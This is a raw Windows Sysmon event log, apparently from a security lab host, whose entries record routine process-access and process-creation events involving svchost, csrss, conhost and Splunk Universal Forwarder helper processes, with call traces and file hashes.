13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.358{59A5CD1D-8E9E-6005-8E00-00000000A301}47764772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.233{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.890{59A5CD1D-8E9F-6005-9000-00000000A301}43604572C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 